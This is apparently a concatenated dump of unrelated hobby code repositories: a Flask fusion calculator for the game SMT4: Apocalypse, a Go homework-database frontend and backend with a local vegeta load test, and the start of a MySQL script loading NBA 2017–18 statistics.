0e2d476943c15fa72d392c9dc5a4587666b47119
[ "SQL", "Go", "Shell" ]
7
Go
liyongcun/falcon-plus
f5f2a95bb34ce5675bebde43f820a1fc8d539e23
8c947418507c9ee075709eb1147f1b055884e1fe
refs/heads/master
<repo_name>cleartonic/smt4a_calc<file_sep>/requirements.txt click==6.7 colorama==0.3.9 coloredlogs==10.0 Flask==1.0.2 Flask-WTF==0.14.2 humanfriendly==4.16.1 itsdangerous==0.24 Jinja2==2.10 MarkupSafe==1.0 numpy==1.15.1 pandas==0.23.4 pyreadline==2.1 python-dateutil==2.7.3 pytz==2018.5 six==1.11.0 Werkzeug==0.14.1 WTForms==2.2.1 xlrd==1.1.0<file_sep>/smt_flask.py import smt_calc as smt from flask import Flask, render_template, flash, request from flask_wtf import FlaskForm from wtforms import Form, TextField, TextAreaField, validators, StringField, SubmitField, SelectField, BooleanField, IntegerField application = Flask(__name__) application.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0 application.config.from_object(__name__) application.config['SECRET_KEY'] = '<KEY>' SKILL_LIST = [(skill,skill) for skill in smt.SKILL_RAW] DEMON_LIST = [(demon,demon) for demon in sorted(smt.DEMON_RAW)] class Profile: # Profile represents every time the user submits a form, what is entered def __init__(self, form_data): for key in form_data: setattr(self,key,form_data[key]) skill_list = list(set([self.skill1,self.skill2,self.skill3,self.skill4,self.skill5,self.skill6,self.skill7,self.skill8])) if len(skill_list) > 1 and '' in skill_list: skill_list.remove('') self.skill_list = skill_list demon_filter_list = list(set([self.filter_demon1,self.filter_demon2,self.filter_demon3,self.filter_demon4])) if len(demon_filter_list) > 1 and '' in demon_filter_list: demon_filter_list.remove('') self.demon_filter_list = demon_filter_list class SkillForm(FlaskForm): skill1 = SelectField(label='Skill', choices=SKILL_LIST) skill2 = SelectField(label='Skill', choices=SKILL_LIST) skill3 = SelectField(label='Skill', choices=SKILL_LIST) skill4 = SelectField(label='Skill', choices=SKILL_LIST) skill5 = SelectField(label='Skill', choices=SKILL_LIST) skill6 = SelectField(label='Skill', choices=SKILL_LIST) skill7 = SelectField(label='Skill', choices=SKILL_LIST) skill8 = SelectField(label='Skill', 
choices=SKILL_LIST) filter_demon1 = SelectField(label='Filter demons:', choices=DEMON_LIST) filter_demon2 = SelectField(label='Filter demons:', choices=DEMON_LIST) filter_demon3 = SelectField(label='Filter demons:', choices=DEMON_LIST) filter_demon4 = SelectField(label='Filter demons:', choices=DEMON_LIST) target_demon = SelectField(label='Target demon:', choices=DEMON_LIST) skill_match_only = BooleanField(label='Strict skill match only:',default=True) strict_filter = BooleanField(label='Strict filtering on all input filter demons:') fusion_level = IntegerField(label='Max Fusion Level (blank defaults to target demon level)') max_trees = IntegerField(label='Max trees',default=10) max_tree_results = IntegerField(label='Max tree results',default=10) max_only = BooleanField(label='Highest scoring output only:',default=True) @application.route("/", methods=['GET', 'POST']) def hello(): form = SkillForm() #if form.validate(): if request.method=='POST': p = Profile(form.data) rc = smt.ResultCluster(p.target_demon, p.skill_list, p.fusion_level,p.skill_match_only,p.max_only,p.demon_filter_list,p.strict_filter) rc.generate_results() # Take score_dict, which is in: { OVERALL SCORE : [list of skill/recruit/demon] } format # And convert to: # { OVERALL SCORE : ( [list of skill/recruit/demon], [RT_LIST] ) } # The reason for the original OVERALL SCORE is to have the ordering of the magnitude (highest scores first) # out if rc.result_failure: return render_template('index.html',form=form) else: output_scores = rc.find_matching_scores() output_scores = {k: v for k, v in output_scores.items() if k < p.max_trees } total_results = rc.total_results total_filtered_results = rc.total_filtered_results del(rc) return render_template('index.html', total_results=total_results, total_filtered_results=total_filtered_results,form=form, output_scores = output_scores, max_trees = p.max_trees, max_tree_results = p.max_tree_results) else: return render_template('index.html',form=form) 
@application.context_processor def utility_functions(): def print_in_console(message): print(str(message)) return dict(mdebug=print_in_console) if __name__ == "__main__": application.jinja_env.cache = {} application.run(debug=True)<file_sep>/readme.md # SMT Reverse Fusion Calculator #### A tool to help identify target demons by dynamically searching for fusions based on matching skills, recruitability, and demon number. #### <a href="http://smt.cleartonic.net" target="_blank">Link to browser interface</a> ### Current version: - Supports SMT4: Apocalypse (English) ### Next versions: - Implement 3/4 fusion requirement demons (functional as of now, but generates too many combinations which crashes the program. Need to smart filter somehow) - Support demon information/graphics in the interface, such as recruit locations, levels, etc. ![image](diagram.png?raw=true "image") ### Premise: Input a target demon (what you're attempting to fuse), and what skills you'd like. The calculator will generate all possible combinations '2 levels down', meaning all combinations that directly create the target demon, then all combinations that create each one of those combinations. This is referred to as a "result tree", just one of the many possible paths to create the final demon. All final result trees are scored on three criteria, in the following priority order: - Skills: higher score for most matching skills relative to the query - Recruitable: higher score for % of demons able to be recruited rather than fused - Demon: # of demons in the fusion The output will sort these results their scores above. Each row shows the first combination down, then clicking on the row expands to all the combinations with the fusion demons and their skills. (note: The "(R)" indicates that the demon is recruitable) For a basic, fast example, try searching Target demon "Pele", and uncheck "highest scoring output". This will return all combinations of Pele. 
Then try filtering for the skill "Mudo" and run again. Then select "highest scoring output", and naturally only the highest score (100/100/3 for skill/recruit/demon) will be shown. This program can be computationally intensive at times - some demons have an incredible amount of combinations (for example, a mid-50s demon such as "Illuyanka" has over 2 million ways to be created with the above '2 levels down' system.) ### Calculator arguments: #### Target demon - The final desired demon Skill - Up to 8 skills can be added. Each result tree will be scored individually based on whether or not the skills appear in the tree. - Setting the "Strict skill match only" flag will require all skills selected to be present in the tree, otherwise it is rejected from the output - Not setting the "Strict skill match only" flag will score all result trees based on how many of the desired skills appear in the result tree. For example, if the desired skills are "Hama", "Mudo", and "Dia", and a result tree's demons only have "Hama" and "Dia", the score will be 66% #### Filter demons - Up to 4 demons can be added. These will allow for filtering the results - Setting the 'strict filtering on all input filter demons" flag requires all filter demons to be present in the result tree - Not setting the 'strict filtering on all input filter demons" flag, but setting any number (1-4) of filtered demons, will show only result trees where at least 1 of the demons is present #### Max fusion level - This is the fusion level of the player character, which limits which fusions are available. - Default fusion level is set to the target demon, if none is entered. - Fusion level 99 assumes all fusions are available - Fusions are assumed to be limited to the max of all demons in the fusion. Theoretically, the player could grind demons past their fusion limit, but this system doesn't accommodate this, and assumes the player can recruit/make demons up to their fusion level. 
If this is a problem, just manually increase the fusion limit. #### Max trees - The number of trees to display. Each tree represents the first level down to make the target demon, at a specific score (based on the whole tree's fusions). Note that if the 'highest scoring output only' flag is set, only the top scoring trees will appear, which will drastically decrease the number of trees (and also speed up processing). #### Max tree results - The number of results in the expanded view for every result tree. When you click on the results bar for a given result tree, how many entries appear. This is set to 10, because most result trees can have a huge amount. This can be set to any number as the limit, but generation may take longer. Further, use filter demons if looking for a specific demon among the trees. #### Flags: - "Strict skill matching only" and "Strict filtering on all input demons" mentioned above - "Highest scoring output only" will output the result trees with the highest score (score = skills, recruitable and demon, prioritized in that order) ### Special Thanks - Thanks to [Caerulius](https://twitter.com/Caerulius) for helping with javascript to support the website's viewability - Inspiration & data from the impressive tools at [https://aqiu384.github.io/megaten-fusion-tool/home](https://aqiu384.github.io/megaten-fusion-tool/home)<file_sep>/static/js3.js $(document).ready(function(){ var hidden_output = 1 $(document).off().on('click','.resulttree',function() { console.log('Click'); var query = $(this).children('.output'); var isVisible = query.is(':visible'); if (isVisible === true) { query.hide(); } else { query.show(); } }); $(document).on('click','.hideoutput',function() { console.log('Hide/show all'); if (hidden_output == 0){ console.log('Call hide'); $('.resulttree').children('.output').hide() hidden_output = 1 } else { console.log('Call show'); $('.resulttree').children('.output').show() hidden_output = 0 } }); 
$('.resulttree').children('.output').hide(); })
b9cab361a2cf4d2c64c4cb29a3388232f85ff838
[ "Markdown", "Python", "Text", "JavaScript" ]
4
Text
cleartonic/smt4a_calc
eed11736b06d4a9cfed8809c40e271cd86dfd9b2
b60fa415432c40960f619e96501bf497d31dc5fa
refs/heads/master
<file_sep>package main import ( "encoding/json" "flag" "fmt" "net" "strconv" "time" "github.com/kataras/iris" "github.com/kataras/iris/middleware/logger" "github.com/kataras/iris/middleware/recover" ) //Data structure for the data type Homework struct { Name string Desc string Submissions int } type FrontendMessage struct { Operation string ID int NewHomework Homework } type BackendMessage struct { Success bool Homeworks []HomeworkStore ErrMessage string Homework Homework } type HomeworkStore struct { Homework Homework Deleted bool } var backend = "" /* The main loop of the program Input: none Output: none */ func main() { //Set flags portNumPtr := flag.Int("listen", 8080, "The port number the server will listen at") backendPtr := flag.String("backend", "localhost:8090", "The address of the backend server") flag.Parse() //Parse any command-line arguments port := *portNumPtr backend = *backendPtr //Initialize the server app := iris.New() app.Use(recover.New()) app.Use(logger.New()) //Set up handle app.Handle("GET", "/", handleHome) app.Get("/edit", handleEdit) app.Get("/edit_form", handleEditForm) app.Get("/create", handleCreate) app.Get("/create_form", handleCreateForm) app.Get("/delete", handleDelete) go ping() //Run the server app.Run(iris.Addr(":" + strconv.Itoa(port))) } /* This function keeps pinging the backend server and report a failure if it does not get a response Input: none Output: none */ func ping() { //Pingack for { response := sendToBackend(FrontendMessage{Operation: "ping"}) if !response.Success { fmt.Println("Detected failure on " + backend + " at " + time.Now().UTC().String()) } time.Sleep(10 * time.Second) } } /* This function handles the request for the home page Input: an iris context Output: none */ func handleHome(ctx iris.Context) { response := sendToBackend(FrontendMessage{Operation: "home"}) if !response.Success { ctx.HTML("<h1>Error loading the home page: " + response.ErrMessage + "</h1>") } homeworks := response.Homeworks 
ctx.HTML("<h1>List of homeworks</h1>") ctx.HTML("<h1>Total number of homeworks: " + strconv.Itoa(len(homeworks)) + "</h1>") if len(homeworks) > 0 { ctx.HTML("<table>") ctx.HTML("<tr><th>Homework</th><th>Description</th><th>Submissions</th></tr>") for index, element := range homeworks { if !element.Deleted { ctx.HTML("<tr><td> <a href=\"/edit?id=" + strconv.Itoa(index) + "\">" + element.Homework.Name + "</a></td><td>" + element.Homework.Desc + "</td><td>" + strconv.Itoa(element.Homework.Submissions) + "</td></tr>") } } ctx.HTML("</table>") } else { ctx.HTML("Empty") } ctx.HTML("<a href=\"/create\">Create a new homework</a>") } /* This function handles the request for the edit page Input: an iris context Output: none */ func handleEdit(ctx iris.Context) { id, _ := strconv.Atoi(ctx.URLParam("id")) response := sendToBackend(FrontendMessage{Operation: "getOne", ID: id}) if !response.Success { ctx.HTML("<h1>Error getting the specified entry: " + response.ErrMessage + "</h1>") } homework := response.Homework ctx.HTML("<h1>Edit Homework</h1>") ctx.HTML("<form action=\"/edit_form\">") ctx.HTML("<input type=\"hidden\" name=\"id\" value=\"" + strconv.Itoa(id) + "\">Name:<br>") ctx.HTML("<input type=\"text\" name=\"itemName\" value=\"" + homework.Name + "\"><br>") ctx.HTML("Description:<br>") ctx.HTML("<input type=\"text\" name=\"desc\" value=\"" + homework.Desc + "\"><br>") ctx.HTML("<input type=\"submit\" value=\"Submit\"></form>") ctx.HTML("<a href=\"/delete\">Delete homework</a><br>") ctx.HTML("<a href=\"/\">Back to home</a>") } /* This function handles the request for the edit_form page Input: an iris context Output: none */ func handleEditForm(ctx iris.Context) { id, _ := strconv.Atoi(ctx.FormValue("id")) name := ctx.FormValue("itemName") desc := ctx.FormValue("desc") response := sendToBackend(FrontendMessage{Operation: "edit", ID: id, NewHomework: Homework{Name: name, Desc: desc}}) if !response.Success { ctx.HTML("<h1>Error editing the specified entry: " + 
response.ErrMessage + "</h1>") } else { ctx.HTML("<h1>Homework Updated!</h1>") } ctx.HTML("<a href=\"/\">Back to home</a>") } /* This function handles the request for the create page Input: an iris context Output: none */ func handleCreate(ctx iris.Context) { ctx.HTML("<h1>Edit Homework</h1>") ctx.HTML("<form action=\"/create_form\">Name:<br>") ctx.HTML("<input type=\"text\" name=\"itemName\"><br>") ctx.HTML("Description:<br><input type=\"text\" name=\"desc\"><br>") ctx.HTML("<input type=\"submit\" value=\"Submit\"></form>") ctx.HTML("<a href=\"/\">Back to home</a>") } /* This function handles the request for the create_form page Input: an iris context Output: none */ func handleCreateForm(ctx iris.Context) { name := ctx.FormValue("itemName") desc := ctx.FormValue("desc") response := sendToBackend(FrontendMessage{Operation: "create", NewHomework: Homework{name, desc, 0}}) if !response.Success { ctx.HTML("<h1>Error creating a new entry: " + response.ErrMessage + "</h1>") } else { ctx.HTML("<h1>Homework Created!</h1>") } ctx.HTML("<a href=\"/\">Back to home</a>") } /* This function handles the request for the delete page Input: an iris context Output: none */ func handleDelete(ctx iris.Context) { id, _ := strconv.Atoi(ctx.FormValue("id")) response := sendToBackend(FrontendMessage{Operation: "delete", ID: id}) if !response.Success { ctx.HTML("<h1>Error deleting the specified entry: " + response.ErrMessage + "</h1>") } else { ctx.HTML("<h1>Homework Deleted!</h1>") } ctx.HTML("<a href=\"/\">Back to home</a>") } /* This function sends a message to the backend server and returns the response Input: a FrontendMessage object Output: a BackendMessage object */ func sendToBackend(message FrontendMessage) BackendMessage { //Attempt to connect to the backend server conn, err := net.Dial("tcp", backend) if err != nil { return BackendMessage{Success: false, ErrMessage: err.Error()} } defer conn.Close() //Send the message to the backend server mes, _ := json.Marshal(message) 
conn.Write(mes) //Set up a timeout timeoutDuration := 5 * time.Second conn.SetReadDeadline(time.Now().Add(timeoutDuration)) //Receive and return the response buf := make([]byte, 1024*1024) //1MB buffer reqLen, bufErr := conn.Read(buf) if bufErr != nil { fmt.Println("Error reading:", bufErr.Error()) return BackendMessage{Success: false, ErrMessage: bufErr.Error()} } response := BackendMessage{} json.Unmarshal(buf[:reqLen], &response) //fmt.Println("Message received:" + string(buf)) return response } <file_sep>package main import ( "encoding/json" "flag" "fmt" "net" "os" "strconv" "sync" ) //Data structure for the data type Homework struct { Name string Desc string Submissions int } type FrontendMessage struct { Operation string ID int NewHomework Homework } type BackendMessage struct { Success bool Homeworks []HomeworkStore ErrMessage string Homework Homework } type HomeworkStore struct { Homework Homework Deleted bool } //Global variable for the data var homeworks = make([]HomeworkStore, 0, 5) var hwlocks = make([]sync.RWMutex, 0, 5) var counter = 0 var databaseLock sync.RWMutex /* The main loop of the program Input: none Output: none */ func main() { //Set flags portNumPtr := flag.Int("listen", 8090, "The port number the server will listen at") flag.Parse() //Parse any command-line arguments portNum := *portNumPtr //Initialize the data initializeData() //Run the server run(portNum) } /* This function initializes the data used for the server Input: none Output: none */ func initializeData() { addHomework(&Homework{"hw1", "Getting to know Go", 0}) addHomework(&Homework{"proj1", "Step 1 to the grand project", 0}) addHomework(&Homework{"hw2", "Getting to know Go again", 0}) addHomework(&Homework{"proj2", "Step 2 to the grand project", 0}) } /* This function runs the backend server Input: an int portnumber Output: none */ func run(port int) { //Attempt to set up the server ln, err := net.Listen("tcp", ":"+strconv.Itoa(port)) if err != nil { fmt.Println("Couldn't bind 
socket") os.Exit(1) } fmt.Println("Backend server running at port " + strconv.Itoa(port)) //The main loop of the backend server for { //Accept a connection conn, err := ln.Accept() go handleConnection(conn, err) } } /* This function handles the request for the home page Input: an iris context Output: none */ func handleConnection(conn net.Conn, err error) { if err != nil { fmt.Fprint(os.Stderr, "Failed to accept") os.Exit(1) } defer conn.Close() //fmt.Fprintln(os.Stderr, "Accepted connection from", conn.RemoteAddr()) //Read a message from the connection buf := make([]byte, 1024) reqLen, bufErr := conn.Read(buf) if bufErr != nil { fmt.Println("Error reading:", bufErr.Error()) } message := FrontendMessage{} json.Unmarshal(buf[:reqLen], &message) //fmt.Println("Message received:" + string(buf)) //Handle the message and respond response := handleMessage(message) res, _ := json.Marshal(response) conn.Write([]byte(res)) //fmt.Fprintln(os.Stderr, "connection ended") } /* This function processes an incoming message from the frontend server and respond accordingly Input: a FrontendMessage object Output: a BackendMessage object */ func handleMessage(message FrontendMessage) BackendMessage { switch message.Operation { case "home": return readAll() case "getOne": return readOne(message.ID) case "edit": return editHomework(message.ID, &message.NewHomework) case "create": return addHomework(&message.NewHomework) case "delete": return removeHomework(message.ID) case "ping": return BackendMessage{Success: true} default: return BackendMessage{Success: false, ErrMessage: "Unknown operation"} } } /* This function returns the entire list of homework Input: None Output: a BackendMessage object */ func readAll() BackendMessage { databaseLock.RLock() defer databaseLock.RUnlock() return BackendMessage{Success: true, Homeworks: homeworks} } /* This function returns the homework object specified by the integer Input: an integer Output: a BackendMessage object */ func readOne(id int) 
BackendMessage { databaseLock.RLock() if id >= len(homeworks) { return BackendMessage{Success: false, ErrMessage: "Index out of range"} } hwlocks[id].RLock() homework := homeworks[id] hwlocks[id].RUnlock() databaseLock.RUnlock() return BackendMessage{Success: true, Homework: homework.Homework} } /* This function creates an entry in the databse for the input Homework object Input: a pointer of Homework Output: a BackendMessage object */ func addHomework(hw *Homework) BackendMessage { hs := HomeworkStore{*hw, false} databaseLock.Lock() //Add the entry to the database homeworks = append(homeworks, hs) //Add a corresponding mutex to the mutex list var m sync.RWMutex hwlocks = append(hwlocks, m) databaseLock.Unlock() return BackendMessage{Success: true} } /* This function edits the entry in the database specified by the integer based on the input Homework object Input: a pointer of Homework and an integer Output: a BackendMessage object */ func editHomework(id int, hw *Homework) BackendMessage { //Even though this function writes to the database, it only acquires the database read lock, //because multiple edit operations need to be allowed as long as they are not editing the same entry, //but edit operations still need to block add operations, which might cause a resizing of the slice databaseLock.RLock() defer databaseLock.RUnlock() if id >= len(homeworks) { return BackendMessage{Success: false, ErrMessage: "Index out of range"} } hwlocks[id].Lock() defer hwlocks[id].Unlock() if !homeworks[id].Deleted { homeworks[id].Homework.Desc = hw.Desc homeworks[id].Homework.Name = hw.Name homeworks[id].Homework.Submissions++ return BackendMessage{Success: true} } else { return BackendMessage{Success: false, ErrMessage: "Specified entry is deleted. Cannot edit. 
"} } } /* This function marks the entry in the database specified by the integer as deleted Input: an integer Output: a BackendMessage object */ func removeHomework(id int) BackendMessage { databaseLock.RLock() defer databaseLock.RUnlock() if id >= len(homeworks) { return BackendMessage{Success: false, ErrMessage: "Index out of range"} } hwlocks[id].Lock() defer hwlocks[id].Unlock() if !homeworks[id].Deleted { homeworks[id].Deleted = true return BackendMessage{Success: true} } else { return BackendMessage{Success: false, ErrMessage: "Specified entry is already deleted. Cannot delete again. "} } } <file_sep># PaxosBase PaxosBase is a scalable distributed database system which supports CRUD operations and hosts a distributed database coordinated by Paxos protocol, allowing a large number of users to create, read, update and delete items in the database. PaxosBase features a frontend built by HTML and a backend built by Go ## How to build: `go run frontend.go --listen (custom port number) --backend (custom address of the backend server)` `go run backend.go --listen (custom port number)` `go run tests.go` <file_sep>package main import ( "bytes" "fmt" "strconv" "sync" "time" vegeta "github.com/tsenart/vegeta/lib" ) type Test struct { workers uint64 rate vegeta.Rate duration time.Duration target vegeta.Target wg *sync.WaitGroup } /* The main loop of the program Input: none Output: none */ func main() { //This class has 60 students and 3 instructors for i := 0; i < 10; i++ { fmt.Println("Round " + strconv.Itoa(i)) readTest() createTest() updateTest() updateCreateTest() } } /* This function implements a Read only test Input: none Output: none */ func readTest() { //Students come in and check out the homework fmt.Println("Test 1: A simple concurrent read test") runTest(Test{ workers: 60, rate: vegeta.Rate{Freq: 100, Per: time.Second}, duration: 4 * time.Second, target: vegeta.Target{ Method: "GET", URL: "http://localhost:8080/", }, }) 
fmt.Println("-------------------------------------------------") } /* This function implements a Create only test Input: none Output: none */ func createTest() { //Instructors decide to give students more homework fmt.Println("Test 2: A simple concurrent create test") runTest(Test{ workers: 3, rate: vegeta.Rate{Freq: 100, Per: time.Second}, duration: 4 * time.Second, target: vegeta.Target{ Method: "GET", URL: "http://localhost:8080/create_form?itemName=projN&desc=Step+N+of+the+project", }, }) fmt.Println("-------------------------------------------------") } /* This function implements an Update only test Input: none Output: none */ func updateTest() { //Students start to submit homework fmt.Println("Test 3: A simple concurrent update test") var wg sync.WaitGroup wg.Add(1) go runTest(Test{ 20, vegeta.Rate{Freq: 100, Per: time.Second}, 2 * time.Second, vegeta.Target{ Method: "GET", URL: "http://localhost:8080/edit_form?id=0&itemName=hw1&desc=Getting+to+know+Go", }, &wg, }) wg.Add(1) go runTest(Test{ 20, vegeta.Rate{Freq: 100, Per: time.Second}, 2 * time.Second, vegeta.Target{ Method: "GET", URL: "http://localhost:8080/edit_form?id=1&itemName=proj1&desc=Step+1+to+the+grand+project", }, &wg, }) wg.Add(1) go runTest(Test{ 20, vegeta.Rate{Freq: 100, Per: time.Second}, 2 * time.Second, vegeta.Target{ Method: "GET", URL: "http://localhost:8080/edit_form?id=2&itemName=hw2&desc=Getting+to+know+Go+again", }, &wg, }) wg.Wait() fmt.Println("-------------------------------------------------") } /* This function implements a mixed Create-Update test Input: none Output: none */ func updateCreateTest() { //Students are submiting homework while intstructors are creating even more homework fmt.Println("Test 4: A simple concurrent update and create test") var wg sync.WaitGroup wg.Add(1) go runTest(Test{ 20, vegeta.Rate{Freq: 100, Per: time.Second}, 2 * time.Second, vegeta.Target{ Method: "GET", URL: "http://localhost:8080/edit_form?id=0&itemName=hw1&desc=Getting+to+know+Go", }, &wg, 
}) wg.Add(1) go runTest(Test{ 20, vegeta.Rate{Freq: 100, Per: time.Second}, 2 * time.Second, vegeta.Target{ Method: "GET", URL: "http://localhost:8080/edit_form?id=1&itemName=proj1&desc=Step+1+to+the+grand+project", }, &wg, }) wg.Add(1) go runTest(Test{ 20, vegeta.Rate{Freq: 100, Per: time.Second}, 2 * time.Second, vegeta.Target{ Method: "GET", URL: "http://localhost:8080/edit_form?id=2&itemName=hw2&desc=Getting+to+know+Go+again", }, &wg, }) wg.Add(1) go runTest(Test{ workers: 3, rate: vegeta.Rate{Freq: 10, Per: time.Second}, duration: 2 * time.Second, target: vegeta.Target{ Method: "GET", URL: "http://localhost:8080/create_form?itemName=projN&desc=Step+N+of+the+project", }, wg: &wg, }) wg.Wait() fmt.Println("-------------------------------------------------") } /* This function runs a test based on the information given by the Test struct Input: a Test object Output: none */ func runTest(test Test) { if test.wg != nil { defer test.wg.Done() } targeter := vegeta.NewStaticTargeter(test.target) attacker := vegeta.NewAttacker(vegeta.Workers(test.workers)) var metrics vegeta.Metrics for res := range attacker.Attack(targeter, test.rate, test.duration, "") { metrics.Add(res) } metrics.Close() var buf bytes.Buffer vegeta.NewTextReporter(&metrics)(&buf) fmt.Println(buf.String()) }
8fde34ca1bbd181a169591d4627249ed64cbf2e6
[ "Markdown", "Go" ]
4
Go
zyyhhxx/PaxosBase
e10ea517e040f15a51b27756a52d0c4421ef2559
eb4973b24536fa12a3f406cdd7e6774f31800f9d
refs/heads/master
<repo_name>bannafingers55/Game-of-Life<file_sep>/readme.txt Hi, welcome to the Game of Life This is a simple version in Pygame. There are two different sizes of sprite, the 1 pixel version and the 40 pixel version. To change between them change the pygame.image.load statements to load the relevent sprite And then the tilesize to the size of the sprite.<file_sep>/gameOfLife.py import random import sys import pygame from pygame.locals import * import time pygame.init() fpsClock = pygame.time.Clock() TILESIZE = 1 width, height = 100, 100 screen = pygame.display.set_mode((width * TILESIZE, height * TILESIZE)) pygame.display.set_caption('Game of Life') #Constants DEAD = 0 ALIVE = 1 grid = [] #Textures textures = { DEAD: pygame.image.load("textures/dead2.png"), ALIVE: pygame.image.load("textures/alive1.png") } for i in range(1, width): app = [] for i in range(1, width): chance = random.randint(0, 100) if chance >= 10: square = DEAD else: square = ALIVE app.append(square) grid.append(app) def main(cells): for i in range(0, len(cells)-1): for n in range(0, width - 1): liveN = 0 try: if cells[i][n - 1] == ALIVE: liveN += 1 if cells[i][n+1] == ALIVE: liveN += 1 if cells[i-1][n] == ALIVE: liveN += 1 if cells[i-1][n + 1] == ALIVE: liveN += 1 if cells[i-1][n-1] == ALIVE: liveN += 1 if cells[i + 1][n] == ALIVE: liveN += 1 if cells[i + 1][n+1] == ALIVE: liveN += 1 if cells[i + 1][n -1] == ALIVE: liveN += 1 except: continue #Death by Isolation if liveN <= 1: cells[i][n] = DEAD #Death by Overcrowding if liveN >= 4: cells[i][n] = DEAD #Birth Rule if liveN == 3: cells[i][n] = ALIVE screen.fill((0, 0, 0)) for event in pygame.event.get(): if event.type == QUIT: pygame.quit() sys.exit() # Update. # Draw. for i in range(0, len(cells)): for n in range(0, width - 1): screen.blit(textures[cells[i][n]], (i * TILESIZE, n * TILESIZE)) pygame.display.flip() time.sleep(0.1) while True: main(grid)
c56bd7efe07f40b15e512e90dbc3a7130aac502d
[ "Python", "Text" ]
2
Text
bannafingers55/Game-of-Life
7a59b1e97bb89058397436e21c63d51ea5696bf9
a7bf15b1e5881ba39fab841a3a0157bb59c270f6
refs/heads/master
<file_sep>import React, { Component } from 'react'; import logo from './logo.svg'; import foods from './foods.json' import FoodBox from './FoodBox'; import AddFood from './AddFood'; import './App.css' import 'bulma/css/bulma.css'; class App extends Component { constructor(props) { super(props) this.state = { allFoods: foods, visible: false, } } toggleFoods = () => { this.setState({ visible: !this.state.visible }); } showFoods() { console.log(this.state) return this.state.allFoods.map((food, index) => { console.log(foods) return <FoodBox key={index} {...food} /> }) } addFoodHandler = (theFood) => { const foodsCopy = [...this.state.allFoods]; foodsCopy.push(theFood); this.setState({ allFoods: foodsCopy, }) } render() { return ( <div className="App"> <header className="App-header"> <h1 className="App-title">IronNutrition</h1> </header> <button onClick={() => this.toggleFoods()}>AddFood </button> {this.state.visible ? <AddFood addTheFood={this.addFoodHandler.bind(this)}/> : null} <div className="foods-list"> {this.showFoods()} </div> </div> ); } } export default App;
fa8bf86fe73ab02d14990786344bd0c29ffee765
[ "JavaScript" ]
1
JavaScript
marcellemcm/lab-react-ironnutrition
cd15d1d3388635a5ae8979b874c3ec23a29fc31c
9c1125c7c6e55d4a9232f82c12ce7bedb4f9c9e0
refs/heads/main
<file_sep>## Images for DE1 Term Project These images outline the outcome of the created views for the analytical layers <file_sep># Term_DE1 ## NBA Statistics (2017-2018) ### Project Aim The aim of this project is to link concepts learned during the DE1SQL course by exercising SQL statements covered. ### Contents #### Detailed Description Describes the project and its components in further detail. Includes the description of analytical layers and the list of analytical questions and the data marts (views) that were created as an answer. #### Data The directory contains the data used for the project in csv format. It includes the following six tables: * Coaches * Player_Stats * Players * Team_Stats * Teams In addition, a description of the data is provided in the folder. #### Codes Contains all the codes that are used to upload the data to MySQL and obtain the answers to the analytical questions. The specific codes are listed below. #### Upload Code (upload_code_nba) The code used to upload the data to MySQL Workbench. #### Player Analytics (individual_player_analytic.sql) The individual_player_analytic.sql holds the code for the player-level analytic layer. It also includes the code for all of the establised views. #### Team Analytics (team_coach_analytic.sql) Includes the code for analytic layer focused on team and coach statistics as well as the susequent views. #### Images Contatins the all the images including the outline of the relational schema and the views created. All images are used in the term_DE1_description.md file. <file_sep>## Data The directory contains the data used for the project in csv format. It includes the following six tables: * Coaches * Player_Stats * Players * Team_Stats * Teams The aforementioned tables servea as a base for the Operational Layer described below. ### Operational Layer The layer data includes of National Basketball Association (NBA) statistics for players, teams and coaches for 2017-2018 season. 
CSV files were used to to store the raw date. Then a schema and tables was created with the same attributes as the CSV files. Finally, the data was inserted into MySQL using the following command LOAD DATA LOCAL INFILE 'path_to_csv_file' INTO TABLE 'corresponding_table' FIELDS TERMINATED BY ',' LINES TERMINATED BY '\r\n' IGNORE 1 LINES <file_sep>DROP SCHEMA IF EXISTS nba_17_18; -- creating schema CREATE SCHEMA nba_17_18; USE nba_17_18; -- Creating Tables -- Coahes CREATE TABLE Coaches ( Name VARCHAR(100), TeamID INT REFERENCES Teams(TeamID), PRIMARY KEY(Name, TeamID)); -- Player Stats CREATE TABLE Player_Stats ( Player VARCHAR(100) NOT NULL, Tm VARCHAR(10) NOT NULL, Gms INT, Gstart INT, MP INT, FG INT, FGA INT, FGP FLOAT, ThreeP INT, ThreePA INT, ThreePP FLOAT, TwoP INT, TwoPA FLOAT, TwoPP FLOAT, eFGP FLOAT, FT INT, FTA FLOAT, FTP FLOAT, ORB INT, DRB INT, TRB INT, AST INT, STL INT, BLK INT, TOV INT, PF INT, PTS INT, PRIMARY KEY(Player, Tm)); -- Players CREATE TABLE Players ( Name VARCHAR(100), Pos VARCHAR(10), Age INT, PRIMARY KEY(Name)); -- Team Stats CREATE TABLE Team_Stats ( TeamId INT, G INT, MP INT, FG INT, FGA INT, FGP FLOAT, ThreeP INT, ThreePA INT, ThreePP FLOAT, TwoP INT, TwoPA INT, TwoPP FLOAT, FT INT, FTA INT, FTP FLOAT, ORB INT, DRB INT, TRB INT, AST INT, STL INT, BLK INT, TOV INT, PF INT, PTS INT, PRIMARY KEY(TeamId)); -- Teams CREATE TABLE Teams ( TeamID INT NOT NULL, TeamName VARCHAR(100) NOT NULL, TeamAbbr VARCHAR(10), Location VARCHAR(100), PRIMARY KEY(TeamID)); -- local_infile to be ON SHOW VARIABLES LIKE "local_infile"; SET GLOBAL local_infile = 'ON'; -- Loading Data -- Load Coaches LOAD DATA LOCAL INFILE '/Data/Coaches.csv' INTO TABLE Coaches FIELDS TERMINATED BY ',' LINES TERMINATED BY '\r\n' IGNORE 1 LINES (Name, TeamID); -- Load Player Stats LOAD DATA LOCAL INFILE '/Data/Player_Stats.csv' INTO TABLE Player_Stats FIELDS TERMINATED BY ',' LINES TERMINATED BY '\r\n' IGNORE 1 LINES (Player, Tm, Gms, Gstart, MP, FG, FGA, FGP, ThreeP, ThreePA, 
